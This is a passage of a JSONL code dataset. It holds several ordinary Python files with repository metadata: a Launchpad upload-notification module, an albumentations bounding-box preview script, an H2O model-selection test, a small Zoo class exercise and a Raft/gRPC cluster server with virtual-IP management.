person.preferredemail is not None]\n\n for recipient in recipients:\n debug(logger, \"Adding recipient: '%s'\", recipient)\n\n return recipients\n\n\ndef build_uploaded_files_list(spr, builds, customfiles, logger):\n \"\"\"Return a list of tuples of (filename, component, section).\n\n Component and section are only set where the file is a source upload.\n If an empty list is returned, it means there are no files.\n Raises LanguagePackRejection if a language pack is detected.\n No emails should be sent for language packs.\n \"\"\"\n files = []\n # Bail out early if this is an upload for the translations\n # section.\n if spr:\n if spr.section.name == 'translations':\n debug(logger,\n \"Skipping acceptance and announcement, it is a \"\n \"language-package upload.\")\n raise LanguagePackEncountered\n for sprfile in spr.files:\n files.append(\n (sprfile.libraryfile.filename, spr.component.name,\n spr.section.name))\n\n # Component and section don't get set for builds and custom, since\n # this information is only used in the summary string for source\n # uploads.\n for build in builds:\n for bpr in build.build.binarypackages:\n files.extend([\n (bpf.libraryfile.filename, '', '') for bpf in bpr.files])\n\n if customfiles:\n files.extend(\n [(file.libraryfilealias.filename, '', '') for file in customfiles])\n\n return files\n\n\ndef build_summary(spr, files, action):\n \"\"\"Build a summary string based on the files present in the upload.\"\"\"\n summary = []\n for filename, component, section in files:\n if action == 'new':\n summary.append(\"NEW: %s\" % filename)\n else:\n summary.append(\" OK: %s\" % filename)\n if filename.endswith(\"dsc\"):\n summary.append(\" -> Component: %s Section: %s\" % (\n component, section))\n return summary\n\n\ndef email_to_person(fullemail):\n \"\"\"Return an `IPerson` given an RFC2047 email address.\n\n :param fullemail: Potential email address.\n :return: `IPerson` with the given email address. None if there\n isn't one, or if `fullemail` isn't a proper email address.\n \"\"\"\n if not fullemail:\n return None\n\n try:\n # The 2nd arg to s_f_m() doesn't matter as it won't fail since every-\n # thing will have already parsed at this point.\n rfc822, rfc2047, name, email = safe_fix_maintainer(fullemail, \"email\")\n return getUtility(IPersonSet).getByEmail(email)\n except ParseMaintError:\n return None\n\n\ndef person_to_email(person):\n \"\"\"Return a string of full name given an IPerson.\"\"\"\n if person and person.preferredemail:\n # This will use email.Header to encode any non-ASCII characters.\n return format_address_for_person(person)\n\n\ndef is_auto_sync_upload(spr, bprs, pocket, changed_by_email):\n \"\"\"Return True if this is a (Debian) auto sync upload.\n\n Sync uploads are source-only, unsigned and not targeted to\n the security pocket. The Changed-By field is also the Katie\n user (archive@ubuntu.com).\n \"\"\"\n changed_by = email_to_person(changed_by_email)\n return (\n spr and\n not bprs and\n changed_by == getUtility(ILaunchpadCelebrities).katie and\n pocket != PackagePublishingPocket.SECURITY)\n\n\ndef fetch_information(spr, bprs, changes, previous_version=None):\n changedby = None\n changedby_displayname = None\n maintainer = None\n maintainer_displayname = None\n\n if changes:\n changesfile = ChangesFile.formatChangesComment(\n sanitize_string(changes.get('Changes')))\n date = changes.get('Date')\n changedby = sanitize_string(changes.get('Changed-By'))\n maintainer = sanitize_string(changes.get('Maintainer'))\n changedby_displayname = changedby\n maintainer_displayname = maintainer\n elif spr or bprs:\n if not spr and bprs:\n spr = bprs[0].build.source_package_release\n changesfile = spr.aggregate_changelog(previous_version)\n date = spr.dateuploaded\n changedby = person_to_email(spr.creator)\n maintainer = person_to_email(spr.maintainer)\n if changedby:\n addr = formataddr((spr.creator.displayname,\n spr.creator.preferredemail.email))\n changedby_displayname = sanitize_string(addr)\n if maintainer:\n addr = formataddr((spr.maintainer.displayname,\n spr.maintainer.preferredemail.email))\n maintainer_displayname = sanitize_string(addr)\n else:\n changesfile = date = None\n\n return {\n 'changelog': changesfile,\n 'date': date,\n 'changedby': changedby,\n 'changedby_displayname': changedby_displayname,\n 'maintainer': maintainer,\n 'maintainer_displayname': maintainer_displayname,\n }\n\n\nclass LanguagePackEncountered(Exception):\n \"\"\"Thrown when not wanting to email notifications for language packs.\"\"\"\n", "repo_name": "abramhindle/UnnaturalCodeFork", "sub_path": "python/testdata/launchpad/lib/lp/soyuz/adapters/notification.py", "file_name": "notification.py", "file_ext": "py", "file_size_in_byte": 24938, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.split", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "lp.services.config.config.launchpad", "line_number": 60, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 60, "usage_type": "name"}, {"api_name": "lp.archivepublisher.utils.get_ppa_reference", "line_number": 64, "usage_type": "call"}, {"api_name": "lp.services.webapp.canonical_url", "line_number": 65, "usage_type": "call"}, {"api_name": "lp.services.mail.helpers.get_email_template", "line_number": 89, "usage_type": "call"}, {"api_name": "lp.archivepublisher.utils.get_ppa_reference", "line_number": 120, "usage_type": "call"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket.SECURITY", "line_number": 157, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 157, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 199, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 199, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 200, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 200, "usage_type": "name"}, {"api_name": "lp.services.mail.sendmail.format_address_for_person", "line_number": 234, "usage_type": "call"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket.BACKPORTS", "line_number": 241, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 241, "usage_type": "name"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket.SECURITY", "line_number": 242, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 242, "usage_type": "name"}, {"api_name": "lp.services.webapp.canonical_url", "line_number": 279, "usage_type": "call"}, {"api_name": "lp.services.config.config.launchpad", "line_number": 280, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 280, "usage_type": "name"}, {"api_name": "lp.soyuz.model.distroseriessourcepackagerelease.DistroSeriesSourcePackageRelease", "line_number": 287, "usage_type": "call"}, {"api_name": "lp.services.webapp.canonical_url", "line_number": 288, "usage_type": "call"}, {"api_name": "lp.archivepublisher.utils.get_ppa_reference", "line_number": 346, "usage_type": "call"}, {"api_name": "lp.services.mail.sendmail.format_address", "line_number": 357, "usage_type": "call"}, {"api_name": "lp.services.config.config.uploader", "line_number": 358, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 358, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 359, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 359, "usage_type": "name"}, {"api_name": "lp.services.mail.sendmail.format_address", "line_number": 366, "usage_type": "call"}, {"api_name": "lp.services.config.config.uploader", "line_number": 367, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 367, "usage_type": "name"}, {"api_name": "lp.services.config.config.uploader", "line_number": 368, "usage_type": "attribute"}, {"api_name": "lp.services.config.config", "line_number": 368, "usage_type": "name"}, {"api_name": "lp.services.encoding.ascii_smash", "line_number": 371, "usage_type": "call"}, {"api_name": "lp.services.encoding.ascii_smash", "line_number": 373, "usage_type": "call"}, {"api_name": "lp.services.encoding.ascii_smash", "line_number": 376, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 399, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 410, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 420, "usage_type": "call"}, {"api_name": "lp.services.mail.sendmail.sendmail", "line_number": 428, "usage_type": "call"}, {"api_name": "lp.services.encoding.guess", "line_number": 443, "usage_type": "call"}, {"api_name": "zope.component.getUtility", "line_number": 460, "usage_type": "call"}, {"api_name": "lp.soyuz.interfaces.archivepermission.IArchivePermissionSet", "line_number": 460, "usage_type": "argument"}, {"api_name": "lp.services.mail.sendmail.format_address_for_person", "line_number": 505, "usage_type": "call"}, {"api_name": "email.mime.multipart", "line_number": 579, "usage_type": "name"}, {"api_name": "lp.archiveuploader.utils.safe_fix_maintainer", "line_number": 579, "usage_type": "call"}, {"api_name": "email.mime.multipart", "line_number": 580, "usage_type": "argument"}, {"api_name": "zope.component.getUtility", "line_number": 580, "usage_type": "call"}, {"api_name": "lp.registry.interfaces.person.IPersonSet", "line_number": 580, "usage_type": "argument"}, {"api_name": "lp.archiveuploader.utils.ParseMaintError", "line_number": 581, "usage_type": "name"}, {"api_name": "lp.services.mail.sendmail.format_address_for_person", "line_number": 589, "usage_type": "call"}, {"api_name": "zope.component.getUtility", "line_number": 603, "usage_type": "call"}, {"api_name": "lp.app.interfaces.launchpad.ILaunchpadCelebrities", "line_number": 603, "usage_type": "argument"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket.SECURITY", "line_number": 604, "usage_type": "attribute"}, {"api_name": "lp.registry.interfaces.pocket.PackagePublishingPocket", "line_number": 604, "usage_type": "name"}, {"api_name": "lp.archiveuploader.changesfile.ChangesFile.formatChangesComment", "line_number": 614, "usage_type": "call"}, {"api_name": "lp.archiveuploader.changesfile.ChangesFile", "line_number": 614, "usage_type": "name"}, {"api_name": "email.utils.formataddr", "line_number": 629, "usage_type": "call"}, {"api_name": "email.utils.formataddr", "line_number": 633, "usage_type": "call"}]} +{"seq_id": "33553633202", "text": "'''\nPlease provide index as input when running this script\nUsed to check if transforms are at all adequate.\n'''\n\nimport cv2\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nimport albumentations as A\nimport albumentations.pytorch\n\nimport config\n\n# dataframe\ndf = pd.read_csv(config.DF_PATH, usecols=['fname', 'height', 'width', 'xmin_coco', 'ymin_coco', 'xmax_coco', 'ymax_coco', 'label'])\n\n# fetch random index\n# idx = np.random.randint(df.shape[0])\n\n# input\nidx = int(input(f'Please provide a picture index between 0 and {df.shape[0]}: '))\n\n# pull image data with random index OR provide index below\nimg_data = df.iloc[idx]\n\n# you can provide index here\n# img_data = df.iloc[477]\n\n# image path\npath = img_data['fname']\n\n# open image\nimage = cv2.imread(path)\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# rectangle coordinates\nx1 = img_data['xmin_coco']\ny1 = img_data['ymin_coco']\nx2 = img_data['xmax_coco'] - x1\ny2 = img_data['ymax_coco'] - y1\n\nBOX_COLOR = (255, 0, 0) # Red\nTEXT_COLOR = (255, 255, 255) # White\n\n\ndef visualize_bbox(image, bboxes, class_name, color=BOX_COLOR, thickness=2):\n \"\"\"Visualizes a single bounding box on the image\"\"\"\n x_min, y_min, w, h = bboxes\n x_min, x_max, y_min, y_max = int(x_min), int(\n x_min + w), int(y_min), int(y_min + h)\n\n cv2.rectangle(image, (x_min, y_min), (x_max, y_max),\n color=color, thickness=thickness)\n\n ((text_width, text_height), _) = cv2.getTextSize(\n class_name, cv2.FONT_HERSHEY_SIMPLEX, 0.35, 1)\n cv2.rectangle(image, (x_min, y_min - int(1.3 * text_height)),\n (x_min + text_width, y_min), BOX_COLOR, -1)\n cv2.putText(\n image,\n text=class_name,\n org=(x_min, y_min - int(0.3 * text_height)),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.35,\n color=TEXT_COLOR,\n lineType=cv2.LINE_AA,\n )\n return image\n\n\ndef visualize(image, bboxes, label, category_id_to_name):\n '''\n Visualize picture with the bbox.\n '''\n image = image.copy()\n for bboxes, category_id in zip(bboxes, label):\n class_name = category_id_to_name[category_id]\n image = visualize_bbox(image, bboxes, class_name)\n plt.figure(figsize=(12, 12))\n plt.axis('off')\n plt.imshow(image)\n plt.show()\n\n\n# has to be list of lists because there is for loop for the bboxes\nbboxes = [[x1, y1, x2, y2]]\n# fetch image class\nlabel = [img_data.label]\n# mapping used to display the class\ncategory_id_to_name = {1: 'cat', 0: 'dog'}\n\n# WITH TRANSFORMS\n\ntransform = A.Compose([\n # A.SmallestMaxSize(presize),\n # A.LongestMaxSize(presize),\n A.RandomSizedBBoxSafeCrop(config.presize, config.presize),\n # A.crops.transforms.CropAndPad(presize),\n # A.RandomCrop(crop, crop),\n # A.Normalize(),\n A.Rotate(limit=30),\n A.HorizontalFlip(p=0.5),\n A.Cutout(p=1.0),\n # albumentations.pytorch.ToTensorV2(),\n],\n # bbox_params=A.BboxParams(format='coco'),\n bbox_params=A.BboxParams(format='coco', label_fields=['label']),\n)\n\n# transformed = transform(image=image, bboxes=bboxes)\ntransformed = transform(image=image,\n bboxes=bboxes,\n label=label)\n\n\nvisualize(\n transformed['image'],\n transformed['bboxes'],\n transformed['label'],\n category_id_to_name\n)\n", "repo_name": "olegperegudov/computer-vision", "sub_path": "cat dogs classifier/src/check_bbox_with_transforms.py", "file_name": "check_bbox_with_transforms.py", "file_ext": "py", "file_size_in_byte": 3333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "config.DF_PATH", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.getTextSize", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "albumentations.Compose", "line_number": 96, "usage_type": "call"}, {"api_name": "albumentations.RandomSizedBBoxSafeCrop", "line_number": 99, "usage_type": "call"}, {"api_name": "config.presize", "line_number": 99, "usage_type": "attribute"}, {"api_name": "albumentations.Rotate", "line_number": 103, "usage_type": "call"}, {"api_name": "albumentations.HorizontalFlip", "line_number": 104, "usage_type": "call"}, {"api_name": "albumentations.Cutout", "line_number": 105, "usage_type": "call"}, {"api_name": "albumentations.BboxParams", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "13349403664", "text": "import sys\nsys.path.insert(1, \"../../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.model_selection import H2OModelSelectionEstimator as modelSelection\n\n# test modelselection algorithm for regression only. Make sure the result frame contains the correct information. Make\n# sure that we can instantiate the best model from model ID, perform scoring with it.\ndef test_gaussian_result_frame_model_id():\n d = h2o.import_file(path=pyunit_utils.locate(\"smalldata/logreg/prostate.csv\"))\n my_y = \"GLEASON\"\n my_x = [\"AGE\",\"RACE\",\"CAPSULE\",\"DCAPS\",\"PSA\",\"VOL\",\"DPROS\"]\n \n maxr_model = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxr\")\n maxr_model.train(training_frame=d, x=my_x, y=my_y)\n maxrsweep_model = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxrsweep\", build_glm_model=True)\n maxrsweep_model.train(training_frame=d, x=my_x, y=my_y)\n maxrsweep_model_glm = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxrsweep\")\n maxrsweep_model_glm.train(training_frame=d, x=my_x, y=my_y)\n maxrsweep_model_MM = modelSelection(seed=12345, max_predictor_number=7, mode=\"maxrsweep\", multinode_mode=True)\n maxrsweep_model_MM.train(training_frame=d, x=my_x, y=my_y)\n\n # make sure results returned by maxr and maxrsweep are the same\n pyunit_utils.compare_frames_local(maxrsweep_model_MM.result()[2:4], maxrsweep_model_glm.result()[2:4], prob=1.0, tol=1e-6)\n pyunit_utils.compare_frames_local(maxr_model.result()[2:4], maxrsweep_model.result()[2:4], prob=1.0, tol=1e-6)\n pyunit_utils.compare_frames_local(maxr_model.result()[2:4], maxrsweep_model_glm.result()[1:3], prob=1.0, tol=1e-6)\n \n allsubsets_model = modelSelection(seed=12345, max_predictor_number=7, mode=\"allsubsets\")\n allsubsets_model.train(training_frame=d, x=my_x, y=my_y)\n result_frame_allsubsets = allsubsets_model.result()\n numRows = result_frame_allsubsets.nrows\n best_r2_allsubsets = allsubsets_model.get_best_R2_values()\n result_frame_maxr = maxr_model.result()\n best_r2_maxr = maxr_model.get_best_R2_values()\n for ind in list(range(numRows)):\n # r2 from attributes\n best_r2_value_allsubsets = best_r2_allsubsets[ind]\n one_model_allsubsets = h2o.get_model(result_frame_allsubsets[\"model_id\"][ind, 0])\n pred_allsubsets = one_model_allsubsets.predict(d)\n print(\"last element of predictor frame: {0}\".format(pred_allsubsets[pred_allsubsets.nrows-1,pred_allsubsets.ncols-1]))\n assert pred_allsubsets.nrows == d.nrows, \"expected dataset row: {0}, actual dataset row: \" \\\n \"{1}\".format(pred_allsubsets.nrows, d.nrows)\n best_r2_value_maxr = best_r2_maxr[ind]\n one_model_maxr = h2o.get_model(result_frame_maxr[\"model_id\"][ind, 0])\n pred_maxr = one_model_maxr.predict(d)\n pyunit_utils.compare_frames_local(pred_maxr, pred_allsubsets, prob=1, tol=1e-6) # compare allsubsets and maxr results\n # r2 from result frame\n frame_r2_allsubsets = result_frame_allsubsets[\"best_r2_value\"][ind,0]\n # r2 from model\n model_r2_allsubsets = one_model_allsubsets.r2()\n # make sure all r2 are equal\n assert abs(best_r2_value_allsubsets-frame_r2_allsubsets) < 1e-6, \"expected best r2: {0}, actual best r2: \" \\\n \"{1}\".format(best_r2_value_allsubsets, frame_r2_allsubsets)\n assert abs(frame_r2_allsubsets-model_r2_allsubsets) < 1e-6, \"expected best r2: {0}, actual best r2: \" \\\n \"{1}\".format(model_r2_allsubsets, frame_r2_allsubsets)\n assert abs(best_r2_value_maxr-model_r2_allsubsets) < 1e-6, \"expected best r2: {0}, maxr best r2: {1}\" \\\n \"\".format(best_r2_value_maxr, model_r2_allsubsets)\n \n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_gaussian_result_frame_model_id)\nelse:\n test_gaussian_result_frame_model_id()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_algos/modelselection/pyunit_PUBDEV_8785_8346_8703_modelselection_result_frame.py", "file_name": "pyunit_PUBDEV_8785_8346_8703_modelselection_result_frame.py", "file_ext": "py", "file_size_in_byte": 4066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "h2o.import_file", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 10, "usage_type": "name"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 14, "usage_type": "call"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 16, "usage_type": "call"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 18, "usage_type": "call"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 20, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 24, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 24, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 25, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 25, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 26, "usage_type": "name"}, {"api_name": "h2o.estimators.model_selection.H2OModelSelectionEstimator", "line_number": 28, "usage_type": "call"}, {"api_name": "h2o.get_model", "line_number": 38, "usage_type": "call"}, {"api_name": "h2o.get_model", "line_number": 44, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.compare_frames_local", "line_number": 46, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 46, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 61, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "28878136191", "text": "\"\"\"Bite 138. OOP fun at the Zoo.\"\"\"\n\nfrom typing import Dict\n\n\nclass Animal:\n \"\"\"Animal object.\"\"\"\n\n counter = 10000\n animals: Dict[str, int] = {}\n\n def __init__(self, name: str):\n \"\"\"Create the object.\"\"\"\n if name not in Animal.animals: # let's not have duplicates\n self._name = name\n Animal.counter += 1\n Animal.animals[self._name] = Animal.counter\n else:\n self._name = name\n\n def __str__(self) -> str:\n \"\"\"Return 'counter. Name' as a string.\n\n Like '10006. Horse'\n \"\"\"\n return f\"{self.animals[self._name]}. {self._name.title()}\"\n\n @classmethod\n def zoo(cls):\n \"\"\"Text list of all animals in zoo.\n\n Every line is an animal's string representation\n \"\"\"\n menagerie = []\n for animal in cls.animals:\n menagerie.append(str(cls(animal)))\n return \"\\n\".join(menagerie)\n", "repo_name": "jsh/pybites", "sub_path": "138/zoo.py", "file_name": "zoo.py", "file_ext": "py", "file_size_in_byte": 931, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "40626323766", "text": "# coding:utf-8\nimport asyncio\nimport json\nimport multiprocessing\nimport sys\nimport time\nimport traceback\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom cluster_master.utils import dc_vip\n\n\nfrom cluster_raft import raft_init, tools, raft_grpc_pb2\nimport grpc\n\nfrom cluster_raft import raft_grpc_pb2_grpc, raft_grpc_server\nfrom sanic import Sanic, request, response\n\nfrom cluster_raft.tools import vip_event, logger, stop_thread, spawn, up_cluster_event\n\nfrom conf import CONFIG\n\napp = Sanic(__name__)\n\nsys.path.append(\"../\")\n\n\n@app.route('/status', methods=[\"GET\"])\nasync def getStatus(request):\n res = raft_init.raft_obj.getStatus()\n return response.json(res)\n\n\n@app.route('/register/')\nasync def h_register(request, host):\n raft_init.raft_obj.addNodeToClusterDC(host)\n result = raft_init.raft_obj.getStatus()\n return response.json(result)\n\n\n# 删除节点\n@app.route('/unregister/')\nasync def h_unregister(request, host):\n raft_init.raft_obj.removeNodeFromClusterDC(host)\n await asyncio.sleep(1)\n result = raft_init.raft_obj.getStatus()\n return response.json(result)\n\n\n# 选举\n@app.route('/election')\nasync def h_election(request):\n # 卸载vip重新选举\n # common.vip_restart.set()\n raft_init.raft_obj.dc_election()\n return response.json({\n 'msg': 'handled election. '\n })\n\n\n@app.route('/node')\nasync def get_all_node(request):\n # 卸载vip重新选举\n # common.vip_restart.set()\n return response.json({\n 'node': raft_init.raft_obj.allNodeAddrs\n })\n\n\ndef vip_load():\n logger.info(vip_event.is_set())\n with grpc.insecure_channel(\"0.0.0.0:{}\".format(CONFIG.get(\"raft_grpc_port\"))) as chan:\n stub = raft_grpc_pb2_grpc.RaftServiceStub(channel=chan)\n\n # p = multiprocessing.Process(target=send_status_to_schedule, args=())\n # p.daemon = True\n from cluster_master.cluster import q1\n while True:\n time.sleep(3)\n ts = int(time.time())\n\n try:\n res_f = stub.GetStatus.future(\n raft_grpc_pb2.GetStatusReq(\n ts=str(ts)), timeout=3)\n if res_f.result().ts == str(ts):\n raft_status = json.loads(res_f.result().status)\n # raft_status = raft_init.raft_obj.getStatus()\n logger.info(\n \"vip_event {},leader {}, self_node {},isReady {}\".format(\n vip_event.is_set(),\n raft_status['leader'],\n raft_status['self'],\n raft_status[\"isReady\"]))\n\n if vip_event.is_set(\n ) and raft_status['leader'] == raft_status['self'] and raft_status[\"state\"] == 2:\n dc_vip.vip.set_vip(\"up\")\n vip_event.clear()\n up_cluster_event.set()\n q1.put(\"start\")\n # logger.info(\"启动>>>cluster_server\")\n # cs = ClusterServer(addr=\"0.0.0.0:8300\")\n # cs.start()\n # cli.append(cs)\n if not vip_event.is_set(\n ) and raft_status['leader'] != raft_status['self']:\n dc_vip.vip.set_vip(\"down\")\n vip_event.set()\n up_cluster_event.clear()\n q1.put(\"stop\")\n\n # cli.pop().stop()\n except Exception as e:\n logger.info(e)\n # logger.info(\"停止>>>cluster_server\")\n # for i in cli:\n # i.stop()\n continue\n\n\ndef start_loop(loop):\n try:\n asyncio.set_event_loop(loop)\n loop.run_forever()\n except asyncio.CancelledError:\n loop.stop()\n\n except Exception as e:\n print(e)\n\n\nasync def raft_event_loop(raft_obj):\n alive_dict = {}\n alive_time = time.time()\n print(alive_time)\n with open(\"loop.log\", \"a\") as fw:\n fw.write(alive_time)\n while True:\n try:\n await asyncio.sleep(.2)\n # 判断事件是否能执行 当启动raft——init时会进行这一步\n if tools.raft_loop.is_set():\n now = time.time()\n fw.write(raft_obj.isReady())\n if raft_obj.isReady():\n status = raft_obj.getStatus()\n if status['state'] == 2:\n # 配置 网卡 开启事件 vip_status\n dc_vip.vip.set_vip('up')\n tools.vip_event.set()\n else:\n # 卸载网卡\n dc_vip.vip.set_vip('down')\n tools.vip_event.clear()\n an = tools.get_all_nodes_from_raft_status(status)\n # 循环写入状态 删除不存在的状态\n for n in an:\n if n == status['self']:\n alive_dict[n] = now\n else:\n k = 'partner_node_status_server_' + n\n if status[k] == 2:\n alive_dict[n] = now\n else:\n if n not in alive_dict:\n alive_dict[n] = now\n elif now - alive_dict[n] > max(\n 2 * len(an),\n 3000\n ):\n raft_obj.removeNodeFromCluster(n)\n del alive_dict[n]\n else:\n pass\n for n in list(alive_dict.keys()):\n if n not in an.keys():\n del alive_dict[n]\n print('\\n{}-{} {} \\n{}'.format(status.get('leader'),\n status.get('raft_term'), len(an), an))\n if status['leader']:\n alive_time = time.time()\n else:\n alive_dict.clear()\n dc_vip.vip.set_vip('down')\n tools.vip_event.clear()\n if time.time() - alive_time > 3000:\n raft_obj.dc_election()\n alive_time = time.time()\n except Exception as e:\n print('{}\\n{}'.format(e, traceback.format_exc()))\n dc_vip.vip.set_vip('down')\n tools.vip_event.clear()\n\n\ndef run_server():\n p = spawn(target=vip_load, name=\"find_vip\")\n try:\n server = grpc.server(ThreadPoolExecutor(40))\n # 将对应的任务处理函数添加到rpc server中\n raft_grpc_pb2_grpc.add_RaftServiceServicer_to_server(\n raft_grpc_server.RaftService(), server)\n # 这里使用的非安全接口,世界gRPC支持TLS/SSL安全连接,以及各种鉴权机制\n server.add_insecure_port(\n \"0.0.0.0:{}\".format(\n CONFIG.get(\"raft_grpc_port\")))\n server.start()\n # 开启服务\n # TODO 开启进程选举会报错\n app.run(\n host='0.0.0.0',\n # 8586端口 只是在muster启动\n port=CONFIG.get(\"raft_http_port\"),\n )\n except Exception as e:\n logger.info(e)\n\n finally:\n stop_thread(p)\n dc_vip.vip.set_vip(\"down\")\n exit(\"退出\")\n\n\nif __name__ == '__main__':\n run_server()\n", "repo_name": "alan-mi/8.16", "sub_path": "cluster_raft/raft_main.py", "file_name": "raft_main.py", "file_ext": "py", "file_size_in_byte": 7873, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sanic.Sanic", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init.raft_obj.getStatus", "line_number": 30, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 30, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 31, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 31, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.addNodeToClusterDC", "line_number": 36, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 36, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.getStatus", "line_number": 37, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 37, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 38, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 38, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.removeNodeFromClusterDC", "line_number": 44, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 44, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj.getStatus", "line_number": 46, "usage_type": "call"}, {"api_name": 